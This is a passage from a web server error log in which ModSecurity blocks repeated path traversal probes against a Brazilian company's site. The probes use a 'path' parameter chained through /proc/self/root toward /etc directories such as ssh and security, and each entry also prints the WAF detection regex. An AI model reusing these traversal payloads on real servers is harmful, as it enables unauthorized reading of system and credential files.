"abf1kP9ocpUE4ed4uDzYmAAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:34.158641 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.243.203:48048] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1kXbQATo66fKoS7w3tQAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:35.477905 2026] [:error] [pid 32654:tid 140411725141760] [client 74.7.243.203:48062] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1kwlT9VtDQc7bgUyWfQAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:36.755584 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.243.203:48064] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1lP9ocpUE4ed4uDzYmQAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:39.088604 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.243.203:48068] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1l5qj1wV0Si-OkefUiAAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:40.359388 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:56052] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1mP9ocpUE4ed4uDzYnAAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:41.658126 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.243.203:56058] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1mXbQATo66fKoS7w3uAAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:42.978848 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.243.203:56070] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1mnbQATo66fKoS7w3vQAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:44.277988 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.243.203:56080] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1nHjZBu2q05ozVU9BjQAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:45.573658 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.243.203:56094] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1nZqj1wV0Si-OkefUjQAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:46.864260 2026] [:error] [pid 10709:tid 140411674785536] [client 74.7.243.203:56096] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1nhXjF1vJNtV6CWrklQAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:48.167064 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.243.203:56112] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1oI6lpbStxTqkSktaSQAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:49.335117 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.243.203:56126] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1obysWC90G-1nBrAw-gAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:52.081311 2026] [:error] [pid 10709:tid 140411649607424] [client 74.7.243.203:41464] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1ohXjF1vJNtV6CWrkmQAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:53.507595 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.243.203:41476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1pf9ocpUE4ed4uDzYogAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:55.890975 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.243.203:41480] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1p7ysWC90G-1nBrAw_wAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:21:05.482302 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.241.46:42872] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1sbABkC4fWIHEf8HWWAAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:21:08.644572 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.241.46:45238] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1tBXjF1vJNtV6CWrknAAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:21:20.846304 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.243.203:41486] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1wP9ocpUE4ed4uDzYvAAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:21:29.578941 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.241.46:45246] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1ydSswJuvopo3lOhMAgAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:21:29.580180 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.243.203:44332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1yNSswJuvopo3lOhMAAAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:21:30.913962 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.243.203:45412] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1yglT9VtDQc7bgUyWiQAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:21:32.205925 2026] [:error] [pid 32654:tid 140411725141760] [client 74.7.243.203:45428] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1zAlT9VtDQc7bgUyWigAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
